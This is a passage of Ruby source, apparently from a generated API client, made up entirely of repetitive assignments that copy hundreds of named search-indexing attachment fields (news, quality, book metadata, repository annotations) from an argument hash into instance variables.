@knowledge_mining_facts_udr_extra_fact_data = args[:knowledge_mining_facts_udr_extra_fact_data] if args.key?(:knowledge_mining_facts_udr_extra_fact_data)\n @knowledge_mining_facts_udr_extra_fact_mention_data = args[:knowledge_mining_facts_udr_extra_fact_mention_data] if args.key?(:knowledge_mining_facts_udr_extra_fact_mention_data)\n @knowledge_mining_facts_universal_fact_metadata = args[:knowledge_mining_facts_universal_fact_metadata] if args.key?(:knowledge_mining_facts_universal_fact_metadata)\n @knowledge_mining_facts_universal_fact_scores = args[:knowledge_mining_facts_universal_fact_scores] if args.key?(:knowledge_mining_facts_universal_fact_scores)\n @knowledge_mining_facts_universal_table_signal = args[:knowledge_mining_facts_universal_table_signal] if args.key?(:knowledge_mining_facts_universal_table_signal)\n @knowledge_mining_facts_web_kv_site_group_signal = args[:knowledge_mining_facts_web_kv_site_group_signal] if args.key?(:knowledge_mining_facts_web_kv_site_group_signal)\n @knowledge_mining_shopping_browseonomy_data = args[:knowledge_mining_shopping_browseonomy_data] if args.key?(:knowledge_mining_shopping_browseonomy_data)\n @knowledge_mining_shopping_twd_model_versions = args[:knowledge_mining_shopping_twd_model_versions] if args.key?(:knowledge_mining_shopping_twd_model_versions)\n @knowledge_mum_story_teaser_annotation = args[:knowledge_mum_story_teaser_annotation] if args.key?(:knowledge_mum_story_teaser_annotation)\n @knowledge_mum_storytime_stamp_engagement_annotation = args[:knowledge_mum_storytime_stamp_engagement_annotation] if args.key?(:knowledge_mum_storytime_stamp_engagement_annotation)\n @knowledge_mum_storytime_stamp_quality_annotation = args[:knowledge_mum_storytime_stamp_quality_annotation] if args.key?(:knowledge_mum_storytime_stamp_quality_annotation)\n @knowledge_tables_table_internal_data = args[:knowledge_tables_table_internal_data] if args.key?(:knowledge_tables_table_internal_data)\n @knowledge_tables_universal_table_annotations = args[:knowledge_tables_universal_table_annotations] if args.key?(:knowledge_tables_universal_table_annotations)\n @knowledge_tasks_universal_task_annotation = args[:knowledge_tasks_universal_task_annotation] if args.key?(:knowledge_tasks_universal_task_annotation)\n @knowledge_tpf_howtodo_howto_video_annotation = args[:knowledge_tpf_howtodo_howto_video_annotation] if args.key?(:knowledge_tpf_howtodo_howto_video_annotation)\n @lang_id_lang_reasoner_document_languages = args[:lang_id_lang_reasoner_document_languages] if args.key?(:lang_id_lang_reasoner_document_languages)\n @lens_vsai_datasets = args[:lens_vsai_datasets] if args.key?(:lens_vsai_datasets)\n @localsearch_authority_site_annotation = args[:localsearch_authority_site_annotation] if args.key?(:localsearch_authority_site_annotation)\n @localyp = args[:localyp] if args.key?(:localyp)\n @maps_synthetics_geo_doc_fetch_key = args[:maps_synthetics_geo_doc_fetch_key] if args.key?(:maps_synthetics_geo_doc_fetch_key)\n @measurement_annotations = args[:measurement_annotations] if args.key?(:measurement_annotations)\n @metaweb_extraction_document_evidence = args[:metaweb_extraction_document_evidence] if args.key?(:metaweb_extraction_document_evidence)\n @modern_format_content = args[:modern_format_content] if args.key?(:modern_format_content)\n @nav_boost_document = args[:nav_boost_document] if args.key?(:nav_boost_document)\n @navboost = args[:navboost] if args.key?(:navboost)\n @news_annotations_content_annotations = args[:news_annotations_content_annotations] if 
args.key?(:news_annotations_content_annotations)\n @news_corpus_hub_page_annotations = args[:news_corpus_hub_page_annotations] if args.key?(:news_corpus_hub_page_annotations)\n @news_corpus_leaf_page_annotation = args[:news_corpus_leaf_page_annotation] if args.key?(:news_corpus_leaf_page_annotation)\n @news_corpus_news_aggregate_signal = args[:news_corpus_news_aggregate_signal] if args.key?(:news_corpus_news_aggregate_signal)\n @news_corpus_news_corpus_annotation = args[:news_corpus_news_corpus_annotation] if args.key?(:news_corpus_news_corpus_annotation)\n @news_corpus_news_corpus_root_annotation = args[:news_corpus_news_corpus_root_annotation] if args.key?(:news_corpus_news_corpus_root_annotation)\n @news_corpus_news_corpus_status_annotation = args[:news_corpus_news_corpus_status_annotation] if args.key?(:news_corpus_news_corpus_status_annotation)\n @news_corpus_newsiness_annotation = args[:news_corpus_newsiness_annotation] if args.key?(:news_corpus_newsiness_annotation)\n @news_corpus_position_rank_annotations = args[:news_corpus_position_rank_annotations] if args.key?(:news_corpus_position_rank_annotations)\n @news_crawl_filter_news_link_crawl_signal = args[:news_crawl_filter_news_link_crawl_signal] if args.key?(:news_crawl_filter_news_link_crawl_signal)\n @news_extraction_news_pbe_annotations = args[:news_extraction_news_pbe_annotations] if args.key?(:news_extraction_news_pbe_annotations)\n @news_nar_indexing_metadata = args[:news_nar_indexing_metadata] if args.key?(:news_nar_indexing_metadata)\n @news_nar_row = args[:news_nar_row] if args.key?(:news_nar_row)\n @news_nar_row_container = args[:news_nar_row_container] if args.key?(:news_nar_row_container)\n @news_near_dups_info = args[:news_near_dups_info] if args.key?(:news_near_dups_info)\n @news_newroman_indexing_new_roman_signal = args[:news_newroman_indexing_new_roman_signal] if args.key?(:news_newroman_indexing_new_roman_signal)\n @news_news_article_checksum = args[:news_news_article_checksum] if args.key?(:news_news_article_checksum)\n @news_news_classifications = args[:news_news_classifications] if args.key?(:news_news_classifications)\n @news_news_content_signals = args[:news_news_content_signals] if args.key?(:news_news_content_signals)\n @news_news_for_education_reading_statistics = args[:news_news_for_education_reading_statistics] if args.key?(:news_news_for_education_reading_statistics)\n @news_videos_news_anchor_source_info = args[:news_videos_news_anchor_source_info] if args.key?(:news_videos_news_anchor_source_info)\n @news_videos_news_video_annotation_signals = args[:news_videos_news_video_annotation_signals] if args.key?(:news_videos_news_video_annotation_signals)\n @nlp_atc_clara_annotation = args[:nlp_atc_clara_annotation] if args.key?(:nlp_atc_clara_annotation)\n @nlp_saft_document = args[:nlp_saft_document] if args.key?(:nlp_saft_document)\n @nlp_saft_nlx_doc_annotator_migration = args[:nlp_saft_nlx_doc_annotator_migration] if args.key?(:nlp_saft_nlx_doc_annotator_migration)\n @nlp_saft_rodin_classification = args[:nlp_saft_rodin_classification] if args.key?(:nlp_saft_rodin_classification)\n @nlp_sentiment_sentiment_annotation = args[:nlp_sentiment_sentiment_annotation] if args.key?(:nlp_sentiment_sentiment_annotation)\n @nlx_doc_annotation = args[:nlx_doc_annotation] if args.key?(:nlx_doc_annotation)\n @noindexed_image_data_list = args[:noindexed_image_data_list] if args.key?(:noindexed_image_data_list)\n @number_annotations = args[:number_annotations] if args.key?(:number_annotations)\n 
@ocean_librarian_book_metadata = args[:ocean_librarian_book_metadata] if args.key?(:ocean_librarian_book_metadata)\n @ocean_librarian_populator_data = args[:ocean_librarian_populator_data] if args.key?(:ocean_librarian_populator_data)\n @ocean_librarian_populator_page_data = args[:ocean_librarian_populator_page_data] if args.key?(:ocean_librarian_populator_page_data)\n @ocean_metadata_all_item_specific_bibdatas = args[:ocean_metadata_all_item_specific_bibdatas] if args.key?(:ocean_metadata_all_item_specific_bibdatas)\n @ocean_metadata_availability_info_component = args[:ocean_metadata_availability_info_component] if args.key?(:ocean_metadata_availability_info_component)\n @ocean_metadata_availability_snapshot = args[:ocean_metadata_availability_snapshot] if args.key?(:ocean_metadata_availability_snapshot)\n @ocean_metadata_availability_snapshot_holder = args[:ocean_metadata_availability_snapshot_holder] if args.key?(:ocean_metadata_availability_snapshot_holder)\n @ocean_metadata_bibkey_component = args[:ocean_metadata_bibkey_component] if args.key?(:ocean_metadata_bibkey_component)\n @ocean_metadata_cluster_horizontal_reference = args[:ocean_metadata_cluster_horizontal_reference] if args.key?(:ocean_metadata_cluster_horizontal_reference)\n @ocean_metadata_cluster_record = args[:ocean_metadata_cluster_record] if args.key?(:ocean_metadata_cluster_record)\n @ocean_metadata_cluster_volumes = args[:ocean_metadata_cluster_volumes] if args.key?(:ocean_metadata_cluster_volumes)\n @ocean_metadata_clustering_series_series_info = args[:ocean_metadata_clustering_series_series_info] if args.key?(:ocean_metadata_clustering_series_series_info)\n @ocean_metadata_clustering_tome_horizontal_link_descriptor = args[:ocean_metadata_clustering_tome_horizontal_link_descriptor] if args.key?(:ocean_metadata_clustering_tome_horizontal_link_descriptor)\n @ocean_metadata_contributor_links = args[:ocean_metadata_contributor_links] if args.key?(:ocean_metadata_contributor_links)\n @ocean_metadata_item_specific_bibdata_component = args[:ocean_metadata_item_specific_bibdata_component] if args.key?(:ocean_metadata_item_specific_bibdata_component)\n @ocean_metadata_kg_topic_links = args[:ocean_metadata_kg_topic_links] if args.key?(:ocean_metadata_kg_topic_links)\n @ocean_metadata_language_info_component = args[:ocean_metadata_language_info_component] if args.key?(:ocean_metadata_language_info_component)\n @ocean_metadata_material_info_component = args[:ocean_metadata_material_info_component] if args.key?(:ocean_metadata_material_info_component)\n @ocean_metadata_parsed_access_terms = args[:ocean_metadata_parsed_access_terms] if args.key?(:ocean_metadata_parsed_access_terms)\n @ocean_metadata_parsed_su_doc = args[:ocean_metadata_parsed_su_doc] if args.key?(:ocean_metadata_parsed_su_doc)\n @ocean_metadata_patent_publication_details = args[:ocean_metadata_patent_publication_details] if args.key?(:ocean_metadata_patent_publication_details)\n @ocean_metadata_physical_measurements_component = args[:ocean_metadata_physical_measurements_component] if args.key?(:ocean_metadata_physical_measurements_component)\n @ocean_metadata_public_domain_info = args[:ocean_metadata_public_domain_info] if args.key?(:ocean_metadata_public_domain_info)\n @ocean_metadata_publication_details_component = args[:ocean_metadata_publication_details_component] if args.key?(:ocean_metadata_publication_details_component)\n @ocean_metadata_rights_component = args[:ocean_metadata_rights_component] if args.key?(:ocean_metadata_rights_component)\n 
@ocean_metadata_series_info_component = args[:ocean_metadata_series_info_component] if args.key?(:ocean_metadata_series_info_component)\n @ocean_metadata_tome_details_component = args[:ocean_metadata_tome_details_component] if args.key?(:ocean_metadata_tome_details_component)\n @ocean_metadata_tome_members_component = args[:ocean_metadata_tome_members_component] if args.key?(:ocean_metadata_tome_members_component)\n @ocean_metadata_tome_price_info = args[:ocean_metadata_tome_price_info] if args.key?(:ocean_metadata_tome_price_info)\n @ocean_reviews_for_work = args[:ocean_reviews_for_work] if args.key?(:ocean_reviews_for_work)\n @ocean_rights_opt_out_request = args[:ocean_rights_opt_out_request] if args.key?(:ocean_rights_opt_out_request)\n @official_pages_query_set = args[:official_pages_query_set] if args.key?(:official_pages_query_set)\n @per_doc_langid_data = args[:per_doc_langid_data] if args.key?(:per_doc_langid_data)\n @personalization_game_webevents_consolidated_events = args[:personalization_game_webevents_consolidated_events] if args.key?(:personalization_game_webevents_consolidated_events)\n @personalization_game_webevents_event = args[:personalization_game_webevents_event] if args.key?(:personalization_game_webevents_event)\n @personalization_game_webevents_events = args[:personalization_game_webevents_events] if args.key?(:personalization_game_webevents_events)\n @photos_geo_annotation = args[:photos_geo_annotation] if args.key?(:photos_geo_annotation)\n @predicted_authenticity = args[:predicted_authenticity] if args.key?(:predicted_authenticity)\n @price_annotations = args[:price_annotations] if args.key?(:price_annotations)\n @quality_anchors_outdegree_outdegree_info = args[:quality_anchors_outdegree_outdegree_info] if args.key?(:quality_anchors_outdegree_outdegree_info)\n @quality_anima_liveweb_liveweb_attachment = args[:quality_anima_liveweb_liveweb_attachment] if args.key?(:quality_anima_liveweb_liveweb_attachment)\n @quality_anima_routines_routines_properties_proto = args[:quality_anima_routines_routines_properties_proto] if args.key?(:quality_anima_routines_routines_properties_proto)\n @quality_authority_topic_embeddings = args[:quality_authority_topic_embeddings] if args.key?(:quality_authority_topic_embeddings)\n @quality_authorship_author_annotations = args[:quality_authorship_author_annotations] if args.key?(:quality_authorship_author_annotations)\n @quality_breadcrumbs_breadcrumb_annotations = args[:quality_breadcrumbs_breadcrumb_annotations] if args.key?(:quality_breadcrumbs_breadcrumb_annotations)\n @quality_calypso_apps_link = args[:quality_calypso_apps_link] if args.key?(:quality_calypso_apps_link)\n @quality_chard_document = args[:quality_chard_document] if args.key?(:quality_chard_document)\n @quality_chard_predicted_query_fringe_score = args[:quality_chard_predicted_query_fringe_score] if args.key?(:quality_chard_predicted_query_fringe_score)\n @quality_chard_predicted_xlq = args[:quality_chard_predicted_xlq] if args.key?(:quality_chard_predicted_xlq)\n @quality_contra_selected_attributions = args[:quality_contra_selected_attributions] if args.key?(:quality_contra_selected_attributions)\n @quality_copia_firefly_site_info = args[:quality_copia_firefly_site_info] if args.key?(:quality_copia_firefly_site_info)\n @quality_discover_ugc_scat_scat_embedding_annotation = args[:quality_discover_ugc_scat_scat_embedding_annotation] if args.key?(:quality_discover_ugc_scat_scat_embedding_annotation)\n @quality_dni_newsstand_pcu = args[:quality_dni_newsstand_pcu] if 
args.key?(:quality_dni_newsstand_pcu)\n @quality_dni_pcu_auxiliary_data = args[:quality_dni_pcu_auxiliary_data] if args.key?(:quality_dni_pcu_auxiliary_data)\n @quality_dni_pcu_meta_annotation = args[:quality_dni_pcu_meta_annotation] if args.key?(:quality_dni_pcu_meta_annotation)\n @quality_dni_pcu_parsed_data = args[:quality_dni_pcu_parsed_data] if args.key?(:quality_dni_pcu_parsed_data)\n @quality_dni_pcu_raw_data = args[:quality_dni_pcu_raw_data] if args.key?(:quality_dni_pcu_raw_data)\n @quality_explore_queryable_feed_ecs_annotation = args[:quality_explore_queryable_feed_ecs_annotation] if args.key?(:quality_explore_queryable_feed_ecs_annotation)\n @quality_explore_queryable_feed_hashtag_annotation = args[:quality_explore_queryable_feed_hashtag_annotation] if args.key?(:quality_explore_queryable_feed_hashtag_annotation)\n @quality_explore_queryable_feed_hashtag_list_annotation = args[:quality_explore_queryable_feed_hashtag_list_annotation] if args.key?(:quality_explore_queryable_feed_hashtag_list_annotation)\n @quality_explore_queryable_feed_topic_feed_scoring_signals = args[:quality_explore_queryable_feed_topic_feed_scoring_signals] if args.key?(:quality_explore_queryable_feed_topic_feed_scoring_signals)\n @quality_freshness_abacus_instant_negative_clicks_info = args[:quality_freshness_abacus_instant_negative_clicks_info] if args.key?(:quality_freshness_abacus_instant_negative_clicks_info)\n @quality_fringe_fringe_query_prior = args[:quality_fringe_fringe_query_prior] if args.key?(:quality_fringe_fringe_query_prior)\n @quality_geo_brainloc_goldmine_brainloc_annotation = args[:quality_geo_brainloc_goldmine_brainloc_annotation] if args.key?(:quality_geo_brainloc_goldmine_brainloc_annotation)\n @quality_geo_logloc_goldmine_document_location_annotation = args[:quality_geo_logloc_goldmine_document_location_annotation] if args.key?(:quality_geo_logloc_goldmine_document_location_annotation)\n @quality_historical_content_age = args[:quality_historical_content_age] if args.key?(:quality_historical_content_age)\n @quality_horizon_proto_horizon_embeddings = args[:quality_horizon_proto_horizon_embeddings] if args.key?(:quality_horizon_proto_horizon_embeddings)\n @quality_horizon_record_info_annotation = args[:quality_horizon_record_info_annotation] if args.key?(:quality_horizon_record_info_annotation)\n @quality_improv_doc_to_queries = args[:quality_improv_doc_to_queries] if args.key?(:quality_improv_doc_to_queries)\n @quality_improv_improv_anchors = args[:quality_improv_improv_anchors] if args.key?(:quality_improv_improv_anchors)\n @quality_lisztomania_document = args[:quality_lisztomania_document] if args.key?(:quality_lisztomania_document)\n @quality_navboost_craps_craps_data = args[:quality_navboost_craps_craps_data] if args.key?(:quality_navboost_craps_craps_data)\n @quality_navboost_craps_craps_pattern_signal = args[:quality_navboost_craps_craps_pattern_signal] if args.key?(:quality_navboost_craps_craps_pattern_signal)\n @quality_negative_clicks_negative_clicks_info = args[:quality_negative_clicks_negative_clicks_info] if args.key?(:quality_negative_clicks_negative_clicks_info)\n @quality_nlq_structured_search_annotation_analysis_automatic_extraction_annotations = args[:quality_nlq_structured_search_annotation_analysis_automatic_extraction_annotations] if args.key?(:quality_nlq_structured_search_annotation_analysis_automatic_extraction_annotations)\n @quality_nlq_structured_search_listing_pages_listing_page_annotations = 
args[:quality_nlq_structured_search_listing_pages_listing_page_annotations] if args.key?(:quality_nlq_structured_search_listing_pages_listing_page_annotations)\n @quality_nsr_doki_annotation = args[:quality_nsr_doki_annotation] if args.key?(:quality_nsr_doki_annotation)\n @quality_nsr_nsr_data = args[:quality_nsr_nsr_data] if args.key?(:quality_nsr_nsr_data)\n @quality_nsr_nsr_sitechunks_annotation = args[:quality_nsr_nsr_sitechunks_annotation] if args.key?(:quality_nsr_nsr_sitechunks_annotation)\n @quality_nsr_pairwiseq_pairwise_q_data = args[:quality_nsr_pairwiseq_pairwise_q_data] if args.key?(:quality_nsr_pairwiseq_pairwise_q_data)\n @quality_nsr_pq_data = args[:quality_nsr_pq_data] if args.key?(:quality_nsr_pq_data)\n @quality_nsr_site_authority = args[:quality_nsr_site_authority] if args.key?(:quality_nsr_site_authority)\n @quality_nsr_uv_sitechunks_annotation = args[:quality_nsr_uv_sitechunks_annotation] if args.key?(:quality_nsr_uv_sitechunks_annotation)\n @quality_orbit_asteroid_belt_intermediate_document_intent_scores = args[:quality_orbit_asteroid_belt_intermediate_document_intent_scores] if args.key?(:quality_orbit_asteroid_belt_intermediate_document_intent_scores)\n @quality_pagemaster_pagemaster_annotations = args[:quality_pagemaster_pagemaster_annotations] if args.key?(:quality_pagemaster_pagemaster_annotations)\n @quality_panoptic_indexing_discover_corpus_annotation = args[:quality_panoptic_indexing_discover_corpus_annotation] if args.key?(:quality_panoptic_indexing_discover_corpus_annotation)\n @quality_panoptic_indexing_discover_document_signal = args[:quality_panoptic_indexing_discover_document_signal] if args.key?(:quality_panoptic_indexing_discover_document_signal)\n @quality_panoptic_indexing_panoptic_annotation = args[:quality_panoptic_indexing_panoptic_annotation] if args.key?(:quality_panoptic_indexing_panoptic_annotation)\n @quality_panoptic_storytime_annotation = args[:quality_panoptic_storytime_annotation] if args.key?(:quality_panoptic_storytime_annotation)\n @quality_panoptic_storytime_scoring_signals = args[:quality_panoptic_storytime_scoring_signals] if args.key?(:quality_panoptic_storytime_scoring_signals)\n @quality_panoptic_voice_ugc_annotation = args[:quality_panoptic_voice_ugc_annotation] if args.key?(:quality_panoptic_voice_ugc_annotation)\n @quality_peoplesearch_namedetector_name_occurrence_annotations = args[:quality_peoplesearch_namedetector_name_occurrence_annotations] if args.key?(:quality_peoplesearch_namedetector_name_occurrence_annotations)\n @quality_popfeeds_chrome_background_annotation = args[:quality_popfeeds_chrome_background_annotation] if args.key?(:quality_popfeeds_chrome_background_annotation)\n @quality_popfeeds_hub_data_annotations = args[:quality_popfeeds_hub_data_annotations] if args.key?(:quality_popfeeds_hub_data_annotations)\n @quality_popfeeds_url_prediction_annotations = args[:quality_popfeeds_url_prediction_annotations] if args.key?(:quality_popfeeds_url_prediction_annotations)\n @quality_popfeeds_url_source_annotations = args[:quality_popfeeds_url_source_annotations] if args.key?(:quality_popfeeds_url_source_annotations)\n @quality_pricedetector_kefir_price_annotations = args[:quality_pricedetector_kefir_price_annotations] if args.key?(:quality_pricedetector_kefir_price_annotations)\n @quality_pricedetector_product_block_annotations = args[:quality_pricedetector_product_block_annotations] if args.key?(:quality_pricedetector_product_block_annotations)\n @quality_prose_json_ld_annotation = 
args[:quality_prose_json_ld_annotation] if args.key?(:quality_prose_json_ld_annotation)\n @quality_prose_thumbnail_selection = args[:quality_prose_thumbnail_selection] if args.key?(:quality_prose_thumbnail_selection)\n @quality_q2_quality_boost = args[:quality_q2_quality_boost] if args.key?(:quality_q2_quality_boost)\n @quality_q2_site_quality_features = args[:quality_q2_site_quality_features] if args.key?(:quality_q2_site_quality_features)\n @quality_realtime_boost_realtime_boost_event = args[:quality_realtime_boost_realtime_boost_event] if args.key?(:quality_realtime_boost_realtime_boost_event)\n @quality_realtime_boost_realtime_boost_response = args[:quality_realtime_boost_realtime_boost_response] if args.key?(:quality_realtime_boost_realtime_boost_response)\n @quality_realtime_boost_seismograph_event_annotations = args[:quality_realtime_boost_seismograph_event_annotations] if args.key?(:quality_realtime_boost_seismograph_event_annotations)\n @quality_realtime_realtime_result_info = args[:quality_realtime_realtime_result_info] if args.key?(:quality_realtime_realtime_result_info)\n @quality_realtime_rt_fact_annotations = args[:quality_realtime_rt_fact_annotations] if args.key?(:quality_realtime_rt_fact_annotations)\n @quality_result_filtering_indexing_cluster_annotations = args[:quality_result_filtering_indexing_cluster_annotations] if args.key?(:quality_result_filtering_indexing_cluster_annotations)\n @quality_richsnippets_apps_protos_application_information_attachment = args[:quality_richsnippets_apps_protos_application_information_attachment] if args.key?(:quality_richsnippets_apps_protos_application_information_attachment)\n @quality_rodin_rodin_site_signal = args[:quality_rodin_rodin_site_signal] if args.key?(:quality_rodin_rodin_site_signal)\n @quality_salient_countries_salient_country_set = args[:quality_salient_countries_salient_country_set] if args.key?(:quality_salient_countries_salient_country_set)\n @quality_salient_structures_salient_structure_set = args[:quality_salient_structures_salient_structure_set] if args.key?(:quality_salient_structures_salient_structure_set)\n @quality_salient_stuff_salient_stuff_set = args[:quality_salient_stuff_salient_stuff_set] if args.key?(:quality_salient_stuff_salient_stuff_set)\n @quality_salient_terms_query_smearing_model = args[:quality_salient_terms_query_smearing_model] if args.key?(:quality_salient_terms_query_smearing_model)\n @quality_salient_terms_salient_term_set = args[:quality_salient_terms_salient_term_set] if args.key?(:quality_salient_terms_salient_term_set)\n @quality_searchoversite_annotator_structured_results_annotation = args[:quality_searchoversite_annotator_structured_results_annotation] if args.key?(:quality_searchoversite_annotator_structured_results_annotation)\n @quality_sherlock_knex_annotation = args[:quality_sherlock_knex_annotation] if args.key?(:quality_sherlock_knex_annotation)\n @quality_shopping_product_review = args[:quality_shopping_product_review] if args.key?(:quality_shopping_product_review)\n @quality_shopping_product_review_page = args[:quality_shopping_product_review_page] if args.key?(:quality_shopping_product_review_page)\n @quality_shopping_shopping_product_review_annotation = args[:quality_shopping_shopping_product_review_annotation] if args.key?(:quality_shopping_shopping_product_review_annotation)\n @quality_similarpages_related_info_signal = args[:quality_similarpages_related_info_signal] if args.key?(:quality_similarpages_related_info_signal)\n @quality_sitemap_document = 
args[:quality_sitemap_document] if args.key?(:quality_sitemap_document)\n @quality_sitemap_third_party_carousels_item_lists = args[:quality_sitemap_third_party_carousels_item_lists] if args.key?(:quality_sitemap_third_party_carousels_item_lists)\n @quality_sixface_sixface_url_data = args[:quality_sixface_sixface_url_data] if args.key?(:quality_sixface_sixface_url_data)\n @quality_snippets_hidden_text_hidden_span_annotations = args[:quality_snippets_hidden_text_hidden_span_annotations] if args.key?(:quality_snippets_hidden_text_hidden_span_annotations)\n @quality_snippets_list_snippets_annotations = args[:quality_snippets_list_snippets_annotations] if args.key?(:quality_snippets_list_snippets_annotations)\n @quality_snippets_metadescription_duplicate_meta_site_signal = args[:quality_snippets_metadescription_duplicate_meta_site_signal] if args.key?(:quality_snippets_metadescription_duplicate_meta_site_signal)\n @quality_snippets_snippet_spans_info = args[:quality_snippets_snippet_spans_info] if args.key?(:quality_snippets_snippet_spans_info)\n @quality_sos_goldmine_sos_annotation = args[:quality_sos_goldmine_sos_annotation] if args.key?(:quality_sos_goldmine_sos_annotation)\n @quality_summary_summary = args[:quality_summary_summary] if args.key?(:quality_summary_summary)\n @quality_tangram_information_types = args[:quality_tangram_information_types] if args.key?(:quality_tangram_information_types)\n @quality_timebased_time_sensitivity_time_sensitivity_annotation = args[:quality_timebased_time_sensitivity_time_sensitivity_annotation] if args.key?(:quality_timebased_time_sensitivity_time_sensitivity_annotation)\n @quality_titles_alternative_titles_info = args[:quality_titles_alternative_titles_info] if args.key?(:quality_titles_alternative_titles_info)\n @quality_titles_sitelinks_target_title_info = args[:quality_titles_sitelinks_target_title_info] if args.key?(:quality_titles_sitelinks_target_title_info)\n @quality_twiddler_domain_classification = args[:quality_twiddler_domain_classification] if args.key?(:quality_twiddler_domain_classification)\n @quality_views_answers_answer_annotation_info = args[:quality_views_answers_answer_annotation_info] if args.key?(:quality_views_answers_answer_annotation_info)\n @quality_visualweb_visual_web_annotation = args[:quality_visualweb_visual_web_annotation] if args.key?(:quality_visualweb_visual_web_annotation)\n @quality_visualweb_visual_web_models_annotation = args[:quality_visualweb_visual_web_models_annotation] if args.key?(:quality_visualweb_visual_web_models_annotation)\n @quality_webanswers_alt_title_saft_doc = args[:quality_webanswers_alt_title_saft_doc] if args.key?(:quality_webanswers_alt_title_saft_doc)\n @quality_webanswers_transcript_annotations = args[:quality_webanswers_transcript_annotations] if args.key?(:quality_webanswers_transcript_annotations)\n @quality_webfeeder_doc_embedding = args[:quality_webfeeder_doc_embedding] if args.key?(:quality_webfeeder_doc_embedding)\n @quality_webshine_doc_resources = args[:quality_webshine_doc_resources] if args.key?(:quality_webshine_doc_resources)\n @rank_boost_doc_attachment = args[:rank_boost_doc_attachment] if args.key?(:rank_boost_doc_attachment)\n @rankembed = args[:rankembed] if args.key?(:rankembed)\n @relative_date_annotations = args[:relative_date_annotations] if args.key?(:relative_date_annotations)\n @repository_annotations_address_annotations = args[:repository_annotations_address_annotations] if args.key?(:repository_annotations_address_annotations)\n 
@repository_annotations_amenities_amenities_annotations = args[:repository_annotations_amenities_amenities_annotations] if args.key?(:repository_annotations_amenities_amenities_annotations)\n @repository_annotations_crawzall_annotations = args[:repository_annotations_crawzall_annotations] if args.key?(:repository_annotations_crawzall_annotations)\n @repository_annotations_discussion_thread_discussion_view_proto = args[:repository_annotations_discussion_thread_discussion_view_proto] if args.key?(:repository_annotations_discussion_thread_discussion_view_proto)\n @repository_annotations_licensed_resources = args[:repository_annotations_licensed_resources] if args.key?(:repository_annotations_licensed_resources)\n @repository_annotations_list_filter_annotations = args[:repository_annotations_list_filter_annotations] if args.key?(:repository_annotations_list_filter_annotations)\n @repository_annotations_list_summary_annotations = args[:repository_annotations_list_summary_annotations] if args.key?(:repository_annotations_list_summary_annotations)\n @repository_annotations_microdata_microdata_annotations = args[:repository_annotations_microdata_microdata_annotations] if args.key?(:repository_annotations_microdata_microdata_annotations)\n @repository_annotations_microformats_hproduct = args[:repository_annotations_microformats_hproduct] if args.key?(:repository_annotations_microformats_hproduct)\n @repository_annotations_microformats_microformat_annotations = args[:repository_annotations_microformats_microformat_annotations] if args.key?(:repository_annotations_microformats_microformat_annotations)\n @repository_annotations_phone_type_phone_type_annotations = args[:repository_annotations_phone_type_phone_type_annotations] if args.key?(:repository_annotations_phone_type_phone_type_annotations)\n @repository_annotations_rdfa_rdfa_annotations = args[:repository_annotations_rdfa_rdfa_annotations] if args.key?(:repository_annotations_rdfa_rdfa_annotations)\n @repository_annotations_rodin_article_annotation = args[:repository_annotations_rodin_article_annotation] if args.key?(:repository_annotations_rodin_article_annotation)\n @repository_annotations_section_heading_annotations = args[:repository_annotations_section_heading_annotations] if args.key?(:repository_annotations_section_heading_annotations)\n @repository_annotations_snippet_segment_snippet_segment_annotations = args[:repository_annotations_snippet_segment_snippet_segment_annotations] if args.key?(:repository_annotations_snippet_segment_snippet_segment_annotations)\n @repository_annotations_spore_authority_signal = args[:repository_annotations_spore_authority_signal] if args.key?(:repository_annotations_spore_authority_signal)\n @repository_annotations_spore_deeplink_annotations = args[:repository_annotations_spore_deeplink_annotations] if args.key?(:repository_annotations_spore_deeplink_annotations)\n @repository_annotations_spore_extractor_topic_annotations = args[:repository_annotations_spore_extractor_topic_annotations] if args.key?(:repository_annotations_spore_extractor_topic_annotations)\n @repository_annotations_spore_extractor_triple_annotations = args[:repository_annotations_spore_extractor_triple_annotations] if args.key?(:repository_annotations_spore_extractor_triple_annotations)\n @repository_annotations_spore_spore_etl_annotation = args[:repository_annotations_spore_spore_etl_annotation] if args.key?(:repository_annotations_spore_spore_etl_annotation)\n @repository_annotations_spore_spore_etl_input_annotations = 
args[:repository_annotations_spore_spore_etl_input_annotations] if args.key?(:repository_annotations_spore_spore_etl_input_annotations)\n @repository_annotations_storehours_store_hours_annotations = args[:repository_annotations_storehours_store_hours_annotations] if args.key?(:repository_annotations_storehours_store_hours_annotations)\n @repository_annotations_verse_annotations = args[:repository_annotations_verse_annotations] if args.key?(:repository_annotations_verse_annotations)\n @repository_annotations_webanswers_context_item_annotations = args[:repository_annotations_webanswers_context_item_annotations] if args.key?(:repository_annotations_webanswers_context_item_annotations)\n @repository_protium_encyclojoins_encyclo_join = args[:repository_protium_encyclojoins_encyclo_join] if args.key?(:repository_protium_encyclojoins_encyclo_join)\n @repository_protium_goldmine_triplification_result = args[:repository_protium_goldmine_triplification_result] if args.key?(:repository_protium_goldmine_triplification_result)\n @repository_protium_goldmine_type_assertion_output = args[:repository_protium_goldmine_type_assertion_output] if args.key?(:repository_protium_goldmine_type_assertion_output)\n @repository_protium_webkv_web_kv = args[:repository_protium_webkv_web_kv] if args.key?(:repository_protium_webkv_web_kv)\n @repository_protium_wikia_wikia_info = args[:repository_protium_wikia_wikia_info] if args.key?(:repository_protium_wikia_wikia_info)\n @repository_updater_index_selection_attachment = args[:repository_updater_index_selection_attachment] if args.key?(:repository_updater_index_selection_attachment)\n @repository_webref_entity_join = args[:repository_webref_entity_join] if args.key?(:repository_webref_entity_join)\n @repository_webref_experimental_webref_entities_attachment = args[:repository_webref_experimental_webref_entities_attachment] if args.key?(:repository_webref_experimental_webref_entities_attachment)\n @repository_webref_graph_mention = args[:repository_webref_graph_mention] if args.key?(:repository_webref_graph_mention)\n @repository_webref_juggernaut_indices = args[:repository_webref_juggernaut_indices] if args.key?(:repository_webref_juggernaut_indices)\n @repository_webref_page_classification_anchor_signals_set = args[:repository_webref_page_classification_anchor_signals_set] if args.key?(:repository_webref_page_classification_anchor_signals_set)\n @repository_webref_page_classification_signals_set = args[:repository_webref_page_classification_signals_set] if args.key?(:repository_webref_page_classification_signals_set)\n @repository_webref_pianno_document_intents = args[:repository_webref_pianno_document_intents] if args.key?(:repository_webref_pianno_document_intents)\n @repository_webref_pianno_tv_season_episode = args[:repository_webref_pianno_tv_season_episode] if args.key?(:repository_webref_pianno_tv_season_episode)\n @repository_webref_preprocessing_reference_page_candidate_list = args[:repository_webref_preprocessing_reference_page_candidate_list] if args.key?(:repository_webref_preprocessing_reference_page_candidate_list)\n @repository_webref_reconcile_response = 